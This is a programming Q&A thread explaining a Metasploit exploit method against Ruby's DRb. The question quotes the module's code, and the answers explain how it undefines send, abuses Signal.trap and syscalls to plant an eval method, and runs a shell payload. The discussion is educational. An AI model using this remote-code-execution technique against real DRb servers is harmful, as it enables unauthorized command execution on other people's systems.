# Understanding ruby syntax "class << variable"

Tags: ruby

I've been looking at an old bug in DRb using metasploit, which uses the method:

```
  def exploit
    serveruri = datastore['URI']
    DRb.start_service
    p = DRbObject.new_with_uri(serveruri)
    class << p
      undef :send
    end

    p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
    # syscall to decide whether it's 64 or 32 bit:
    # it's getpid on 32bit which will succeed, and writev on 64bit
    # which will fail due to missing args
    begin
      pid = p.send(:syscall, 20)
      p.send(:syscall, 37, pid, 23)
    rescue Errno::EBADF
      # 64 bit system
      pid = p.send(:syscall, 39)
      p.send(:syscall, 62, pid, 23)
    end
    p.send(:my_eval, payload.encoded)
  end
```

I'm not a ruby programmer, but I have a general sense of what's going on besides few lines. 
Can anyone explain what's happening in lines 5-9? (starts at "class << ...")

Comment: @tom-lord I voted to re-open this question, since it's not only about the `class << ...` idiom, but also about how this is used in line 9 (the `p.send` call AFTER `send` was previously undefined).

Answer (score 2, accepted):

```
class << p
  undef :send
end
```

This undefined the `send` method of the object `p` (`send` is used for dynamically invoking methods on a receiver).

It does this in order to exploit `DRbObject`'s `method_missing` implementation, which routes method calls to remote objects. I'm not too familiar with `DRb`, but I'm guessing this may have been done in order to get things past `DRbServer`'s `check_insecure_method` check, but I'll leave that as an exercise to you since it's outside the scope of the question asked here.

Once it achieves whatever it needed to do through `method_missing` it adds a method `my_eval` to `Object` on the server process, which then uses `system` to execute the payload as a shell command.

Comment: Thanks a lot! One last question: in the invocation of send after undef-ing it, the third parameter is :someLongString. How does ruby interpret it? Does it try to invoke a method called someLongString?

Comment: @sel: Is there something unclear in the documentation of the `send` method? Can you tell us what *exactly* is unclear so that the Ruby developers can improve the documentation for future readers?

Comment: I have to admit this is the part I left as an exercise to you. I'm *guessing* that the whole point of `undef`ing and falling back on method missing was to get the symbol (note the leading colon, i.e. `:someLongString`) evaluated in the context of the `DRbServer` process. Once this is done, the `p.send(:my_eval, payload.encoded)` makes use of the newly added method to execute the payload.

Comment: @JörgWMittag This isn't Ruby's `send` method. That was previously `undef`fined from `p` and the `p.send` in line 9 will actually go through `DRbObject#method_missing` which is sort of the whole point of this exploit.

Answer (score 2):

```
class << p
  undef :send
end
```

This chunk undefines `send` on the local `DRbObject` instance. As Michael pointed out, if a `DRbObject` does not have a method defined, it will route the method call to the remote server using `method_missing`.

In this case, all succeeding `send` calls will be routed to the remote server and evaluated there instead of the local instance.

```
p.send(:trap, 23, :"class Object\ndefmy_eval(str)\nsystem(str.untaint)\nend\nend")
```

This triggers `Signal.trap` with signal 23 and a symbol which appears to contain a chunk of code which if evaluated, will create a method on `Object` which provides direct access to the shell.

According to the documentation, `Signal.trap` can be used to run a block or a command upon receiving a specific signal from the operating system. It's not very clear what a command is, so I did some playing around.

```
 >   pid = fork { Signal.trap(23, :"puts 'test'"); puts "sleeping"; sleep 10 }
sleeping                                                                       #=> 37162
>> Process.detach(pid) #=> #<Thread:0x007f9e13a61d60 sleep>
>> Process.kill(23, pid)
test                     #=> 1
```

Looks like a command in symbol form will be converted to string then `eval`ed by `Signal.trap`.

```
# syscall to decide whether it's 64 or 32 bit:
# it's getpid on 32bit which will succeed, and writev on 64bit
# which will fail due to missing args
begin
  pid = p.send(:syscall, 20)
  p.send(:syscall, 37, pid, 23)
```

This section triggers `Kernel#syscall` which calls Unix kernel functions. The `rescue` bit handles 64 bit syscall numbers. Let's just look at the 32 bit section here:

- `p.send(:syscall, 20)` should evaluate to `sys_getpid()`
- `p.send(:syscall, 37, pid, 23)` should evaluate to `sys_kill(<pid>, 23)`. This will trigger the earlier trap set up for signal `23`.

In conclusion, the exploit:

1. Undefines `send` to force messages through `method_missing`
2. Uses `method_missing` to trigger `Signal.trap(23)` with a chunk of ruby code converted to a one line string in symbol form
3. Uses `Kernel#syscall` to get the PID of the currently running process
4. Uses `Kernel#syscall` to call `kill -23 <pid>`, which causes the trap set up in 2 to trigger, which in turn evals the provided symbol to create the `my_eval` method on `Object` which provides access to `system` (shell command line access)
5. Calls the newly created `my_eval` method with the payload

References:

http://syscalls.kernelgrok.com/

https://ruby-doc.org/core-2.2.0/Signal.html#method-c-trap

https://ruby-doc.org/core-2.2.0/Kernel.html#method-i-syscall